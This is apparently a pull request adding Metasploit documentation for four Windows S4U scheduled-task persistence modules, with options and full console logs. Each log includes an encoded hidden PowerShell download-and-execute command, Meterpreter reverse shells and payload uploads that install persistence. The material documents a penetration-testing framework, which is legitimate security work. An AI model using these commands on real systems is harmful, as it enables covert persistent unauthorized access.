### PR TITLE
s4u persistence updates

### DIFF
--- a/documentation/modules/exploit/windows/persistence/service_for_user/event.md
+++ b/documentation/modules/exploit/windows/persistence/service_for_user/event.md
@@ -1,5 +1,14 @@
 ## Vulnerable Application
 
+Creates a scheduled task that will run using service-for-user (S4U).
+This allows the scheduled task to run even as an unprivileged user
+that is not logged into the device. This will result in lower security
+context, allowing access to local resources only. The module
+requires 'Logon as a batch job' permissions (SeBatchLogonRight).
+
+This variant uses an event trigger to launch the payload when a
+specified event is logged to the Windows Event Log.
+
 ### Event Trigger Ideas
 
 #### Service Start

--- a/documentation/modules/exploit/windows/persistence/service_for_user/event.md
+++ b/documentation/modules/exploit/windows/persistence/service_for_user/event.md
@@ -1,0 +1,174 @@
+## Vulnerable Application
+
+### Event Trigger Ideas
+
+#### Service Start
+
+Services like Windows Update, Google Update etc will trigger this (likely multiple times)
+
+```
+set EVENT_ID 7036
+set EVENT_LOG System
+```
+
+#### Terminal Service Connection
+
+In the System log, Event ID 56 usually comes from the TerminalServices-RemoteConnectionManager or TermDD source.
+
+```
+set EVENT_ID 5156
+set EVENT_LOG System
+set XPATH *[EventData[Data = \'INSERT IP ADDRESS\']]
+```
+
+Trigger the event with `nmap -sV -p 3389 x.x.x.x`
+
+#### Failed Login (admin permissions required)
+
+```
+set EVENT_ID 4625
+set EVENT_LOG Security
+```
+
+Trigger the event with `smbclient` or `auxiliary/scanner/smb/smb_login`
+
+### Event Log Start
+
+Should take place after a reboot
+
+```
+set EVENT_ID 6005
+set EVENT_LOG System
+```
+
+## Verification Steps
+
+1. Start msfconsole
+2. Get a user level shell
+3. Do: `use exploit/windows/persistence/service_for_user/event`
+4. Do: `set event_id #`
+5. Do: `set session #`
+6. Do: `run`
+7. Wait for the event to occur, or cause it to occur
+8. You should eventually get a shell.
+
+## Options
+
+### EXPIRE_TIME
+
+Number of minutes until trigger expires. Defaults to `0`
+
+### PAYLOAD_NAME
+
+Name of payload file to write. Random string as default.
+
+### TASK_NAME
+
+The name of task. Random string as default.
+
+### EVENT_LOG
+
+The event log to check for event. Defaults to `System`. Choices are: `Application`, `System`, `Security`, `Setup`, `ForwardedEvents`
+
+### EVENT_ID
+
+Event ID to trigger on.
+
+### XPATH
+
+XPath query
+
+## Scenarios
+
+### Windows 7 (6.1 Build 7601, Service Pack 1)
+
+Initial shell
+
+```
+resource (/root/.msf4/msfconsole.rc)> setg verbose true
+verbose => true
+resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
+lhost => 1.1.1.1
+resource (/root/.msf4/msfconsole.rc)> setg payload cmd/linux/http/x64/meterpreter/reverse_tcp
+payload => cmd/linux/http/x64/meterpreter/reverse_tcp
+resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
+[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
+resource (/root/.msf4/msfconsole.rc)> set target 2
+target => 2
+resource (/root/.msf4/msfconsole.rc)> set srvport 8085
+srvport => 8085
+resource (/root/.msf4/msfconsole.rc)> set uripath w2
+uripath => w2
+resource (/root/.msf4/msfconsole.rc)> set payload payload/windows/x64/meterpreter/reverse_tcp
+payload => windows/x64/meterpreter/reverse_tcp
+resource (/root/.msf4/msfconsole.rc)> set lport 4449
+lport => 4449
+resource (/root/.msf4/msfconsole.rc)> run
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+[*] Starting persistent handler(s)...
+[*] Started reverse TCP handler on 1.1.1.1:4449 
+[*] Using URL: http://1.1.1.1:8085/w2
+[*] Server started.
+[*] Run the following command on the target machine:
+powershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAA9AFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyADsAJABwAGMATQBzAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAOwBpAGYAKABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBQAHIAbwB4AHkAXQA6ADoARwBlAHQARABlAGYAYQB1AGwAdABQAHIAbwB4AHkAKAApAC4AYQBkAGQAcgBlAHMAcwAgAC0AbgBlACAAJABuAHUAbABsACkAewAkAHAAYwBNAHMALgBwAHIAbwB4AHkAPQBbAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBHAGUAdABTAHkAcwB0AGUAbQBXAGUAYgBQAHIAbwB4AHkAKAApADsAJABwAGMATQBzAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsAfQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADIALgAyADIAOAA6ADgAMAA4ADUALwB3ADIALwBjAHcAaABtAE4AUAA0AEoAdAB5ACcAKQApADsASQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMgAuADIAMgA4ADoAOAAwADgANQAvAHcAMgAnACkAKQA7AA==
+msf exploit(multi/script/web_delivery) > 
+[*] 2.2.2.2    web_delivery - Powershell command length: 3720
+[*] 2.2.2.2    web_delivery - Delivering Payload (3720 bytes)
+[*] Sending stage (230982 bytes) to 2.2.2.2
+[*] Meterpreter session 1 opened (1.1.1.1:4449 -> 2.2.2.2:49554) at 2025-12-27 07:23:36 -0500
+
+msf exploit(multi/script/web_delivery) > sessions -i 1
+[*] Starting interaction with 1...
+
+meterpreter > sysinfo
+Computer        : WINDOWS7
+OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 3
+Meterpreter     : x64/windows
+meterpreter > getuid
+Server username: windows7\windows
+meterpreter > background
+[*] Backgrounding session 1...
+```
+
+Install persistence
+
+```
+msf exploit(multi/script/web_delivery) > use exploit/windows/persistence/service_for_user/event 
+[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
+msf exploit(windows/persistence/service_for_user/event) > set event_id 7036
+event_id => 7036
+msf exploit(windows/persistence/service_for_user/event) > set payload windows/meterpreter/reverse_tcp
+payload => windows/meterpreter/reverse_tcp
+msf exploit(windows/persistence/service_for_user/event) > set session 1
+session => 1
+msf exploit(windows/persistence/service_for_user/event) > exploit
+[*] Exploit running as background job 1.
+[*] Exploit completed, but no session was created.
+
+[*] Started reverse TCP handler on 1.1.1.1:4444 
+msf exploit(windows/persistence/service_for_user/event) > [*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Target is likely exploitable
+[*] Uploading C:\Users\windows\AppData\Local\Temp\lOsbcWHh.exe
+[+] Successfully Uploaded remote executable to C:\Users\windows\AppData\Local\Temp\lOsbcWHh.exe
+[+] Successfully wrote XML file to C:\Users\windows\AppData\Local\Temp\LAxYVJnmQ.xml
+[+] Persistence task McmPkAnp created successfully
+[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/WINDOWS7_20251227.2649/WINDOWS7_20251227.2649.rc
+
+msf exploit(windows/persistence/service_for_user/event) > 
+```
+
+Start any service, Google Chrome Update Service (gpupdate) causes ~2 shells, this was the Fax service.
+
+```
+[*] Sending stage (188998 bytes) to 2.2.2.2
+[*] Sending stage (188998 bytes) to 2.2.2.2
+[*] Sending stage (188998 bytes) to 2.2.2.2
+[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:49557) at 2025-12-27 07:27:55 -0500
+[*] Meterpreter session 3 opened (1.1.1.1:4444 -> 2.2.2.2:49558) at 2025-12-27 07:27:55 -0500
+[*] Meterpreter session 6 opened (1.1.1.1:4444 -> 2.2.2.2:49561) at 2025-12-27 07:27:57 -0500
+```

--- a/documentation/modules/exploit/windows/persistence/service_for_user/lock_unlock.md
+++ b/documentation/modules/exploit/windows/persistence/service_for_user/lock_unlock.md
@@ -1,0 +1,126 @@
+## Vulnerable Application
+
+Creates a scheduled task that will run using service-for-user (S4U).
+This allows the scheduled task to run even as an unprivileged user
+that is not logged into the device. This will result in lower security
+context, allowing access to local resources only. The module
+requires 'Logon as a batch job' permissions (SeBatchLogonRight).
+
+This triggers on either a lock or unlock of the workstation.
+
+## Verification Steps
+
+1. Start msfconsole
+2. Get a user level shell
+3. Do: `use exploit/windows/persistence/service_for_user/lock_unlock`
+4. Do: `set session #`
+5. Do: `run`
+6. Lock or unlock the system
+7. You should eventually get a shell.
+
+## Options
+
+### TRIGGER
+
+Payload trigger method. Defaults to `unlock`, choices are: `lock`, `unlock`
+
+### EXPIRE_TIME
+
+Number of minutes until trigger expires. Defaults to `0`
+
+### PAYLOAD_NAME
+
+Name of payload file to write. Random string as default.
+
+### TASK_NAME
+
+The name of task. Random string as default.
+
+## Scenarios
+
+### Windows 7 (6.1 Build 7601, Service Pack 1)
+
+Initial shell
+
+```
+resource (/root/.msf4/msfconsole.rc)> setg verbose true
+verbose => true
+resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
+lhost => 1.1.1.1
+resource (/root/.msf4/msfconsole.rc)> setg payload cmd/linux/http/x64/meterpreter/reverse_tcp
+payload => cmd/linux/http/x64/meterpreter/reverse_tcp
+resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
+[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
+resource (/root/.msf4/msfconsole.rc)> set target 2
+target => 2
+resource (/root/.msf4/msfconsole.rc)> set srvport 8085
+srvport => 8085
+resource (/root/.msf4/msfconsole.rc)> set uripath w2
+uripath => w2
+resource (/root/.msf4/msfconsole.rc)> set payload payload/windows/x64/meterpreter/reverse_tcp
+payload => windows/x64/meterpreter/reverse_tcp
+resource (/root/.msf4/msfconsole.rc)> set lport 4449
+lport => 4449
+resource (/root/.msf4/msfconsole.rc)> run
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+[*] Starting persistent handler(s)...
+[*] Started reverse TCP handler on 1.1.1.1:4449 
+[*] Using URL: http://1.1.1.1:8085/w2
+[*] Server started.
+[*] Run the following command on the target machine:
+powershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAA9AFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyADsAJABiAFcAPQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAA7AGkAZgAoAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAFAAcgBvAHgAeQBdADoAOgBHAGUAdABEAGUAZgBhAHUAbAB0AFAAcgBvAHgAeQAoACkALgBhAGQAZAByAGUAcwBzACAALQBuAGUAIAAkAG4AdQBsAGwAKQB7ACQAYgBXAC4AcAByAG8AeAB5AD0AWwBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoARwBlAHQAUwB5AHMAdABlAG0AVwBlAGIAUAByAG8AeAB5ACgAKQA7ACQAYgBXAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsAfQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADIALgAyADIAOAA6ADgAMAA4ADUALwB3ADIALwBhADMAVwAwAEYAMQB1ADYARABKAHQAMQBuACcAKQApADsASQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMgAuADIAMgA4ADoAOAAwADgANQAvAHcAMgAnACkAKQA7AA==
+msf exploit(multi/script/web_delivery) > 
+[*] 2.2.2.2    web_delivery - Powershell command length: 3712
+[*] 2.2.2.2    web_delivery - Delivering Payload (3712 bytes)
+[*] Sending stage (230982 bytes) to 2.2.2.2
+
+msf exploit(multi/script/web_delivery) > [*] Meterpreter session 1 opened (1.1.1.1:4449 -> 2.2.2.2:49801) at 2025-12-26 16:44:47 -0500
+
+msf exploit(multi/script/web_delivery) > sessions -i 1
+[*] Starting interaction with 1...
+
+meterpreter > sysinfo
+Computer        : WINDOWS7
+OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 3
+Meterpreter     : x64/windows
+meterpreter > getuid
+Server username: windows7\windows
+meterpreter > background
+[*] Backgrounding session 1...
+```
+
+Install persistence
+
+```
+msf exploit(multi/script/web_delivery) > use exploit/windows/persistence/service_for_user/lock_unlock 
+[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
+msf exploit(windows/persistence/service_for_user/lock_unlock) > set payload windows/meterpreter/reverse_tcp
+payload => windows/meterpreter/reverse_tcp
+msf exploit(windows/persistence/service_for_user/lock_unlock) > set session 1
+session => 1
+msf exploit(windows/persistence/service_for_user/lock_unlock) > exploit
+[*] Exploit running as background job 1.
+[*] Exploit completed, but no session was created.
+
+[*] Started reverse TCP handler on 1.1.1.1:4444 
+msf exploit(windows/persistence/service_for_user/lock_unlock) > [*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Target is likely exploitable
+[*] Uploading C:\Users\windows\AppData\Local\Temp\gJBmPcpAn.exe
+[+] Successfully Uploaded remote executable to C:\Users\windows\AppData\Local\Temp\gJBmPcpAn.exe
+[+] Successfully wrote XML file to C:\Users\windows\AppData\Local\Temp\fGMeBGOMRYMUd.xml
+[+] Persistence task oftkeQLa created successfully
+[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/WINDOWS7_20251226.4527/WINDOWS7_20251226.4527.rc
+```
+
+Lock the system, and unlock it
+
+```
+msf exploit(windows/persistence/service_for_user/lock_unlock) > 
+[*] Sending stage (188998 bytes) to 2.2.2.2
+[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:49802) at 2025-12-26 16:45:58 -0500
+```

--- a/documentation/modules/exploit/windows/persistence/service_for_user/logon.md
+++ b/documentation/modules/exploit/windows/persistence/service_for_user/logon.md
@@ -1,0 +1,120 @@
+## Vulnerable Application
+
+Creates a scheduled task that will run using service-for-user (S4U).
+This allows the scheduled task to run even as an unprivileged user
+that is not logged into the device. This will result in lower security
+context, allowing access to local resources only. The module
+requires 'Logon as a batch job' permissions (SeBatchLogonRight).
+
+This triggers on event 4101 which validates the Windows license after logon.
+
+## Verification Steps
+
+1. Start msfconsole
+2. Get a user level shell
+3. Do: `use exploit/windows/persistence/service_for_user/logon`
+4. Do: `set session #`
+5. Do: `run`
+6. Log in to the system
+7. You should eventually get a shell.
+
+## Options
+
+### EXPIRE_TIME
+
+Number of minutes until trigger expires. Defaults to `0`
+
+### PAYLOAD_NAME
+
+Name of payload file to write. Random string as default
+
+### TASK_NAME
+
+The name of task. Random string as default.
+
+### Windows 7 (6.1 Build 7601, Service Pack 1)
+
+Initial shell
+
+```
+resource (/root/.msf4/msfconsole.rc)> setg verbose true
+verbose => true
+resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
+lhost => 1.1.1.1
+resource (/root/.msf4/msfconsole.rc)> setg payload cmd/linux/http/x64/meterpreter/reverse_tcp
+payload => cmd/linux/http/x64/meterpreter/reverse_tcp
+resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
+[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
+resource (/root/.msf4/msfconsole.rc)> set target 2
+target => 2
+resource (/root/.msf4/msfconsole.rc)> set srvport 8085
+srvport => 8085
+resource (/root/.msf4/msfconsole.rc)> set uripath w2
+uripath => w2
+resource (/root/.msf4/msfconsole.rc)> set payload payload/windows/x64/meterpreter/reverse_tcp
+payload => windows/x64/meterpreter/reverse_tcp
+resource (/root/.msf4/msfconsole.rc)> set lport 4449
+lport => 4449
+resource (/root/.msf4/msfconsole.rc)> run
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+[*] Starting persistent handler(s)...
+[*] Started reverse TCP handler on 1.1.1.1:4449 
+[*] Using URL: http://1.1.1.1:8085/w2
+[*] Server started.
+[*] Run the following command on the target machine:
+powershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAA9AFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyADsAJABmAGwAagBXAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAOwBpAGYAKABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBQAHIAbwB4AHkAXQA6ADoARwBlAHQARABlAGYAYQB1AGwAdABQAHIAbwB4AHkAKAApAC4AYQBkAGQAcgBlAHMAcwAgAC0AbgBlACAAJABuAHUAbABsACkAewAkAGYAbABqAFcALgBwAHIAbwB4AHkAPQBbAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBHAGUAdABTAHkAcwB0AGUAbQBXAGUAYgBQAHIAbwB4AHkAKAApADsAJABmAGwAagBXAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsAfQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADIALgAyADIAOAA6ADgAMAA4ADUALwB3ADIALwBnAFgASwBQADcAawBpADIATwBUAFUARQBOACcAKQApADsASQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMgAuADIAMgA4ADoAOAAwADgANQAvAHcAMgAnACkAKQA7AA==
+msf exploit(multi/script/web_delivery) > 
+[*] 2.2.2.2    web_delivery - Powershell command length: 3694
+[*] 2.2.2.2    web_delivery - Delivering Payload (3694 bytes)
+[*] Sending stage (230982 bytes) to 2.2.2.2
+[*] Meterpreter session 1 opened (1.1.1.1:4449 -> 2.2.2.2:49789) at 2025-12-26 16:23:40 -0500
+
+msf exploit(multi/script/web_delivery) > sessions -i 1
+[*] Starting interaction with 1...
+
+meterpreter > sysinfo
+Computer        : WINDOWS7
+OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/windows
+meterpreter > getuid
+Server username: windows7\windows
+meterpreter > background
+[*] Backgrounding session 1...
+```
+
+Install persistence
+
+```
+msf exploit(multi/script/web_delivery) > use exploit/windows/persistence/service_for_user/logon
+[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
+msf exploit(windows/persistence/service_for_user/logon) > set payload windows/meterpreter/reverse_tcp
+payload => windows/meterpreter/reverse_tcp
+msf exploit(windows/persistence/service_for_user/logon) > set session 1
+session => 1
+msf exploit(windows/persistence/service_for_user/logon) > exploit
+[*] Exploit running as background job 1.
+[*] Exploit completed, but no session was created.
+
+[*] Started reverse TCP handler on 1.1.1.1:4444 
+msf exploit(windows/persistence/service_for_user/logon) > [*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Target is likely exploitable
+[*] Uploading C:\Users\windows\AppData\Local\Temp\QmJIhshGLWM.exe
+[+] Successfully Uploaded remote executable to C:\Users\windows\AppData\Local\Temp\QmJIhshGLWM.exe
+[*] This triggers on event 4101 which validates the Windows license after logon
+[+] Successfully wrote XML file to C:\Users\windows\AppData\Local\Temp\YAIHto.xml
+[+] Persistence task YKgnVyDO created successfully
+[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/WINDOWS7_20251226.2718/WINDOWS7_20251226.2718.rc
+```
+
+Logout and log back in
+
+```
+msf exploit(windows/persistence/service_for_user/logon) > [*] 2.2.2.2 - Meterpreter session 1 closed.  Reason: Died
+msf exploit(windows/persistence/service_for_user/logon) > [*] Sending stage (188998 bytes) to 2.2.2.2
+[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:49792) at 2025-12-26 16:29:21 -0500
+```

--- a/documentation/modules/exploit/windows/persistence/service_for_user/schedule.md
+++ b/documentation/modules/exploit/windows/persistence/service_for_user/schedule.md
@@ -1,0 +1,139 @@
+## Vulnerable Application
+
+Creates a scheduled task that will run using service-for-user (S4U).
+This allows the scheduled task to run even as an unprivileged user
+that is not logged into the device. This will result in lower security
+context, allowing access to local resources only. The module
+requires 'Logon as a batch job' permissions (SeBatchLogonRight).
+
+Creates a scheduled task to run the payload ever FREQUENCY minutes for
+the duration of EXPIRE_TIME.
+
+## Verification Steps
+
+1. Start msfconsole
+2. Get a user level shell
+3. Do: `use exploit/windows/persistence/service_for_user/schedule`
+4. Do: `set session #`
+5. Do: `run`
+6. You should eventually get a shell.
+
+## Options
+
+### FREQUENCY
+
+Frequency in minutes to execute. Defaults to `60`
+
+### EXPIRE_TIME
+
+Number of minutes until trigger expires. Defaults to `0`
+
+### PAYLOAD_NAME
+
+Name of payload file to write. Random string as default.
+
+### TASK_NAME
+
+The name of task. Random string as default.
+
+## Scenarios
+
+### Windows 7 (6.1 Build 7601, Service Pack 1)
+
+Initial shell
+
+```
+resource (/root/.msf4/msfconsole.rc)> setg verbose true
+verbose => true
+resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.18
+lhost => 1.1.1.18
+resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
+[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
+resource (/root/.msf4/msfconsole.rc)> set target 2
+target => 2
+resource (/root/.msf4/msfconsole.rc)> set srvport 8085
+srvport => 8085
+resource (/root/.msf4/msfconsole.rc)> set uripath w2
+uripath => w2
+resource (/root/.msf4/msfconsole.rc)> set payload payload/windows/x64/meterpreter/reverse_tcp
+payload => windows/x64/meterpreter/reverse_tcp
+resource (/root/.msf4/msfconsole.rc)> set lport 4449
+lport => 4449
+resource (/root/.msf4/msfconsole.rc)> run
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+[*] Starting persistent handler(s)...
+[*] Started reverse TCP handler on 1.1.1.18:4449 
+[*] Using URL: http://1.1.1.18:8085/w2
+[*] Server started.
+[*] Run the following command on the target machine:
+powershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAA9AFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyADsAJABtADMAQQA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ADsAaQBmACgAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAUAByAG8AeAB5AF0AOgA6AEcAZQB0AEQAZQBmAGEAdQBsAHQAUAByAG8AeAB5ACgAKQAuAGEAZABkAHIAZQBzAHMAIAAtAG4AZQAgACQAbgB1AGwAbAApAHsAJABtADMAQQAuAHAAcgBvAHgAeQA9AFsATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEcAZQB0AFMAeQBzAHQAZQBtAFcAZQBiAFAAcgBvAHgAeQAoACkAOwAkAG0AMwBBAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsAfQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADIALgAyADIAOAA6ADgAMAA4ADUALwB3ADIALwBlAFAAVQBlAFUATQBBAHMANAB4AGEAbgByAHkAMQAnACkAKQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADIALgAyADIAOAA6ADgAMAA4ADUALwB3ADIAJwApACkAOwA=
+msf exploit(multi/script/web_delivery) > 
+[*] 2.2.2.2    web_delivery - Powershell command length: 3726
+[*] 2.2.2.2    web_delivery - Delivering Payload (3726 bytes)
+[*] Sending stage (230982 bytes) to 2.2.2.2
+[*] Meterpreter session 1 opened (1.1.1.18:4449 -> 2.2.2.2:49760) at 2025-12-26 15:35:16 -0500
+
+msf exploit(multi/script/web_delivery) > sessions -i 1
+[*] Starting interaction with 1...
+
+meterpreter > sysinfo
+Computer        : WINDOWS7
+OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/windows
+meterpreter > getuid
+Server username: windows7\windows
+meterpreter > background
+[*] Backgrounding session 1...
+```
+
+Install persistence
+
+```
+msf exploit(multi/script/web_delivery) > use exploit/windows/persistence/service_for_user/schedule 
+[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
+msf exploit(windows/persistence/service_for_user/schedule) > set frequency 5
+frequency => 5
+msf exploit(windows/persistence/service_for_user/schedule) > set expire_time 7
+expire_time => 7
+msf exploit(windows/persistence/service_for_user/schedule) > set session 1
+session => 1
+msf exploit(windows/persistence/service_for_user/schedule) > set payload windows/meterpreter/reverse_tcp
+payload => windows/meterpreter/reverse_tcp
+msf exploit(windows/persistence/service_for_user/schedule) > rexploit
+[*] Reloading module...
+[*] Exploit running as background job 1.
+[*] Exploit completed, but no session was created.
+
+[*] Started reverse TCP handler on 1.1.1.18:4444 
+msf exploit(windows/persistence/service_for_user/schedule) > [*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Target is likely exploitable
+[*] Uploading C:\Users\windows\AppData\Local\Temp\BruDqCGH.exe
+[+] Successfully Uploaded remote executable to C:\Users\windows\AppData\Local\Temp\BruDqCGH.exe
+[+] Successfully wrote XML file to C:\Users\windows\AppData\Local\Temp\KSPbcFQO.xml
+[+] Persistence task LVNzSUTTA created successfully
+[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/WINDOWS7_20251226.3810/WINDOWS7_20251226.3810.rc
+
+msf exploit(windows/persistence/service_for_user/schedule) > date
+[*] exec: date
+
+Fri Dec 26 03:38:13 PM EST 2025
+```
+
+Wait
+
+```
+msf exploit(windows/persistence/service_for_user/schedule) > 
+[*] Sending stage (188998 bytes) to 2.2.2.2
+[*] Meterpreter session 2 opened (1.1.1.18:4444 -> 2.2.2.2:49768) at 2025-12-26 15:43:03 -0500
+
+msf exploit(windows/persistence/service_for_user/schedule) > sessions -i 2
+[*] Starting interaction with 2...
+
+meterpreter > getuid
+Server username: windows7\windows
+```

--- a/modules/exploits/windows/persistence/service_for_user/event.rb
